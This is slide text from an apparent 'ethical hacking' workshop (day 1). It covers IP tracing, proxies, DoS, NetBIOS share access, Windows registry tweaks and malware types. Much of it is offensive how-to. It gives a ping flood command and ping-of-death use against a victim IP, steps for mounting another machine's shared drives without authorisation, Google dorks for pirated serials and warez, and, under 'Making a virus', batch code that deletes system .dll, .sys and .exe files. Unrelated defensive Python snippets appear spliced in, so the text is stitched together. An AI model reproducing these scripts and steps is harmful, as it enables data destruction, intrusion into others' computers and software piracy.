workshop day1

Post on 29-May-2018

  • 8/8/2019 Workshop Day1

    Information Security and Ethical Hacking

    www.informationsecurityclub.com

    Internet Protocol (IP)
    Tracing IP
    Denial of services (DoS)
    Sharing
    Unwanted Access
    Using proxies

    Windows Hack
    Registry editing
    Multi yahoo
    Changing names of icons.
    Disabling features - shutdown, restart etc.

    Tips on Google surfing
    Rapid share

    viruses, trojans, worms

    Phishers
    Tools

    Brutus - brute forces
    Windows password
    Backdoor Entry

    Trojans
    Remote employing monitors

    Other malicious tools

    Day 1 Day 2

    Binders

    Key logging
    Windows password
    Etc..

    Ethical Hacking

    From E-commerce to information gathering and entertainment, the Internet has evolved into a one-stop resource for both professional and personal purposes.

    Unfortunately, the same Internet is also used by computer criminals to carry out cyber crimes, such as identity theft and virus/worm/Trojan attacks, etc.

    Ethical hackers are the sentinels of the Internet. Their work involves understanding the mind of the cyber criminal, tracing and tracking his functioning, and innovating new strategies and methods to safeguard online activity.

    Thinking like cyber criminals to thwart them is both a challenging and interesting job. And with the demand for certified ethical hackers increasing every day, a career in this field is also evolving into a professionally satisfying and monetarily lucrative option.

    WHO ARE HACKERS?

    Anarchist Hackers
    Their sole intent on system infiltration is to cause damage or use information to create havoc.

    Hackers
    They don't particularly care about bragging about their accomplishments as it exposes them to suspicion. They prefer to work from behind the scenes and preserve their anonymity.

    Crackers
    This is primarily the term given to individuals who are skilled at the art of bypassing software copyright protection.

    Ethical Hacker

    Being able to attribute your attacks to the right type of attacker is very important. By identifying your attacker to be either an Anarchist Hacker or a Hacker you get a better idea of what you're up against.

    Know your enemy and know yourself and you will always be victorious...

    IP Address

    32 bits combination.
    Static
    dynamic

    own ip.
    Ipconfig
    www.whatismyip.com
    www.danasoft.com

    server ip address
    ping www.anylan.in
    nslookup www.anylan.in
    www.whois.se

    ip tracing
    tracert www.anylan.in

    Tracing ip during chatting

    Netstat -n
    Netstat -a

    Port 5050 or 5101

    Tracing the ip locations

    E-mail Headers

    Neo trace pro

    Proxy

    www.russianproxy.com

    www.kproxy.com

    www.cooltunnel.com

    www.mathtunnel.com

    hidemyip

    DoS Attack

    Conceptually, DoS attacks are intended to prevent legitimate users, customers or clients of a site from successfully accessing it.

    Traditional DoS attacks have been aimed at consuming resources or disrupting services at the network or operating system level.

    Typical examples are server-based attacks such as SYN floods and bandwidth exhaustion attacks that attempt to saturate the victim's Internet connection with spurious traffic.

    Death by overloading of system.

    DOS Attack

    Denial Of Services

    In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, web sites, online accounts (banking, etc.), or other services that rely on the affected computer.

    ping [IP ADDRESS HERE or WEBSITE] -t -l 15000

    DoS & DDoS

    Oversized Packets

    This is called the "Ping of Death" (ping -1 65510 192.168.2.3) on a Windows system (where 192.168.2.3 is the IP address of the intended victim). What is happening is the attacker is pinging every port on the victim's computer causing it to echo back 65510 requests.

    The main goal of the "Ping of Death" is to generate a packet size that exceeds 65,535 bytes, which can abruptly cause the victim computer to crash.
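A packet larger than 65,535 bytes only comes into existence when IP fragments are reassembled, so a filter or a patched stack tests each fragment's offset plus length against that limit. The check below is an added example, not part of the original slides; the function names are hypothetical and the sample headers are constructed with documentation-range addresses.

```python
import struct

MAX_IP_DATAGRAM = 65535  # ceiling imposed by the 16-bit IPv4 total-length field

def sample_header(offset_bytes, payload_len, more_fragments):
    """Constructed 20-byte IPv4 header (protocol 1 = ICMP) describing one fragment."""
    flags_frag = (0x2000 if more_fragments else 0) | (offset_bytes // 8)
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0x1234,
                       flags_frag, 64, 1, 0,
                       bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20]))

def reassembled_size(header):
    """Size the datagram must reach for this fragment to fit: header + offset + payload."""
    ver_ihl, _tos, total_len, _ident, flags_frag = struct.unpack("!BBHHH", header[:8])
    ihl = (ver_ihl & 0x0F) * 4             # header length in bytes
    offset = (flags_frag & 0x1FFF) * 8     # fragment offset is counted in 8-byte units
    return ihl + offset + (total_len - ihl)

def is_oversized(header):
    """True when reassembly would exceed 65,535 bytes, the Ping of Death condition."""
    return reassembled_size(header) > MAX_IP_DATAGRAM

def flag_fragments(headers):
    """Return (index, reassembled size) for each fragment a filter should drop."""
    return [(i, reassembled_size(h)) for i, h in enumerate(headers) if is_oversized(h)]

# Constructed traffic: two ordinary fragments, one at the exact limit, one over it.
SAMPLE = [
    sample_header(0, 1480, True),
    sample_header(1480, 1480, False),
    sample_header(65512, 3, False),      # 20 + 65512 + 3 = 65535, still legal
    sample_header(65528, 1480, False),   # 20 + 65528 + 1480 = 67028, overflows
]

if __name__ == "__main__":
    print(flag_fragments(SAMPLE))
```
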

    DoS

    Ping Attack

    Symptoms Of DoS

    unusually slow network performance (opening files or accessing web sites)

    unavailability of a particular web site

    inability to access any web site

    dramatic increase in the amount of spam you receive in your account

    NetBios

    Network Basic Input Output System and is used as a way for computers in a LAN or a WAN (local network or internet/wider network) to share printers or drives.

    WAN attack that will be more interesting for most of you guys, and it is the WAN attack that will be more dangerous.

    Steps

    Start up your terminal (Start > run > cmd). You will be given this prompt:
    C:\WINDOWS>

    make sure the host is alive:
    C:\WINDOWS> ping 10.1.1.3
    If it is, you'll get something like this in response:
    Reply from 10.1.1.3: byte=32 time

    NBtSTAT -a 10.1.1.3
    HACKME-921J UNIQUE Registered
    MSHOME GROUP Registered
    HACKME-921J UNIQUE Registered
    HACKME-921J UNIQUE Registered
    MSHOME GROUP Registered
    HACKABLEUSER UNIQUE Registered
    MSHOME UNIQUE Registered

    ? That means that the target has files/folders/drives/etc. being shared on that computer

    C:\WINDOWS> NET VIEW \\10.1.1.3
    Which will hopefully give a response like this:

    Shared resources on 10.1.1.3
    Share name Type Comment
    --------------------------------------------
    C Disk
    D Disk
    Command completed successfully.

    mount them locally:
    C:\WINDOWS> NET USE G: \\10.1.1.3\C
    Command completed successfully.

    go to "My Computer" and browse those files.

    serials

    In the search field type: "Product name" 94FBR

    Where "Product Name" is the name of the item you want to find the serial number for.

    94FBR is part of an Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.

    1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.

    2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

    Unlimited Rapidshare download

    go to temporary internet files folder and delete all the cookies related to rapidshare.

    make a bat file and run it every time
    ipconfig /flushdns
    ipconfig /release
    ipconfig /renew
    exit

    turn your modem off and on

    Other google ways

    Look for Appz in Parent Directory

    intext:"parent directory" intext:"[EXE]"

    intext:"parent directory" index of:"[EXE]"

    intext:"parent directory" index of:"[RAR]"

    This will look for any exe or optionally for zip, rar, ace, iso, bin, etc.

    Look for Moviez in Parent Directory

    intext:"parent directory" intext:"[VID]"

    intext:"parent directory" index of:"[VID]"

    This will look for any video filetype in parent directory. You can optionally add index:"xvid" or intext:"divx" for a specific codec movie.

    Look for Muzik in Parent Directory

    intext:"parent directory" intext:"[MP3]"

    intext:"parent directory" index of:"[MP3]"

    This will look for any music files.

    Look for Gamez in Parent Directory

    intext:"parent directory" index of:"[Gamez]"

    Registry

    The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to Control Panel settings, File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.

    The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained separately in the %SystemRoot%\System32\Config directory. You cannot edit these files directly; you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).

    The Registry has a hierarchical structure

    There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:

    * HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.

    * HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.

    * HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC; this information is used for all users who log onto this computer.

    * HKEY_USERS - This branch contains individual preferences for each user of the computer; each user is represented by a SID sub-key located under the main branch.

    * HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.

    * HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE for use with the Plug-&-Play features of Windows; this section is dynamic and will change as devices are added and removed from the system.

    Each registry value is stored as one of five main data types:

    * REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.

    * REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device drivers and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.

    * REG_EXPAND_SZ - This type is an expandable data string, that is, a string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will be replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)

    * REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values; each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)

    * REG_SZ - This type is a standard string, used to represent human readable text values.

    Playing With Registry

    Take backup of the registry

    [HKEY_LOCAL_MACHINE\SYSTEM\Setup]
    "SetupType"=dword:00000000
    "CmdLine"="setup -newsetup"
    "SystemPrefix"=hex:c5,0b,00,00,00,40,36,02

    Deleting the key values
    [-HKEY_LOCAL_MACHINE\SYSTEM\Setup]

    Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
    "NoClose"="1"

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
    "NoDrives"=dword:03ffffff

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]
    "LegalNoticeCaption"="Caption here."
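A .reg file applies every line without asking, so it is worth reading one mechanically before importing it. The sketch below is an added example, not part of the original slides: it decodes the value types described earlier and lists key deletions, value deletions and anything written under a Policies key. Function names are hypothetical and the sample file is constructed from the entries quoted on the slides.

```python
import re

# Constructed sample in .reg syntax, built from the entries quoted on the slides.
SAMPLE_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=dword:00000000
"CmdLine"="setup -newsetup"
"SystemPrefix"=hex:c5,0b,00,00,00,40,36,02

[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoClose"="1"
"NoDrives"=dword:03ffffff
'''

def decode_value(raw):
    """Map the right-hand side of a .reg line to (registry type, Python value)."""
    if raw.startswith("dword:"):
        return "REG_DWORD", int(raw[6:], 16)
    m = re.match(r"hex(?:\(([0-9a-fA-F]+)\))?:(.*)", raw)
    if m:  # hex: is raw binary; hex(2) and hex(7) carry the two special string types
        kinds = {None: "REG_BINARY", "2": "REG_EXPAND_SZ", "7": "REG_MULTI_SZ"}
        data = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
        return kinds.get(m.group(1), "hex(%s)" % m.group(1)), data
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return "REG_SZ", raw[1:-1].replace("\\\\", "\\").replace('\\"', '"')
    raise ValueError("unrecognised value: %r" % raw)

def hidden_drives(mask):
    """NoDrives is a bitmask: bit 0 hides A:, bit 1 hides B:, ... bit 25 hides Z:."""
    return "".join(chr(ord("A") + i) for i in range(26) if (mask >> i) & 1)

def audit(reg_text):
    """Return the entries to review before the file is imported."""
    findings, key = [], None
    for line in reg_text.replace("\\\n", "").splitlines():
        line = line.strip()
        if line.startswith("[-"):          # whole key (and subkeys) would be deleted
            findings.append(("delete-key", line[2:-1], None))
            key = None
        elif line.startswith("["):
            key = line[1:-1]
        elif line.startswith('"') and key and '"=' in line:
            name, raw = line[1:].split('"=', 1)
            if raw == "-":                 # "Name"=- deletes a single value
                findings.append(("delete-value", key, name))
            elif "\\policies\\" in key.lower() + "\\":
                findings.append(("policy", key, (name,) + decode_value(raw)))
    return findings

if __name__ == "__main__":
    print(*audit(SAMPLE_REG), sep="\n")
```

Passing the decoded NoDrives value to `hidden_drives` shows that the mask 03ffffff covers every drive letter from A to Z.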

    Multiple yahoo login

    Navigate to HKEY_CURRENT_USER\Software\Yahoo\Pager\Test.

    In the right pane, right-click and choose New > DWORD value.

    Rename the value to Plural.

    Double click and assign a decimal value of 1.

    Viruses, Worms and Trojans

    Types of viruses
    There are many types of viruses. Typical viruses are simply programs or scripts that will do various damage to your computer, such as corrupting files, copying itself into files, slowly deleting all your hard drive etc.

    Worms
    Worms are a different type of virus, but the same idea; they are usually designed to copy themselves a lot over a network and usually try to eat up as much bandwidth as possible by sending commands to servers to try to get in.

    Trojans
    Trojans are another type of virus. They are simply like a server which enables hackers to get into and control the computer. A trojan such as Subseven can enable a hacker to do various things such as control the mouse, eject the cd-rom drive, delete/download/upload files and much more.

    MBR viruses
    Boot sector viruses are another type. They are similar to file viruses, but instead they go in the boot sector and can cause serious damage when the computer is booted; some can easily format your drive simply by booting your computer. These are hard to remove.

    .exe .com .bat .scr .pif .vbs

    E-mail, p2p

    the main thing to watch out for is the file size.

    Icons, binders

    Making a virus

    This virus is undetectable by antivirus scanners. Open notepad and paste this code:

    Code:@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys this will deleteall .dll and .sys files.

    Code:@Echo off c: cd %WinDir%\System\ deltree /y *. p sw cd\ deltree /y *.exe

    Vbs-vb script

    onclick=msgbox ("[email protected]",20,"[email protected]")
    yesclick=msgbox ("[email protected]",20,"[email protected]")
    yesclick=msgbox ("[email protected]",20,"[email protected]")
    yesclick=msgbox ("[email protected]",20,"[email protected]")
    yesclick=msgbox ("[email protected]",20,"[email protected]")
    yesclick=msgbox ("[email protected]",20,"[email protected]")

    crash
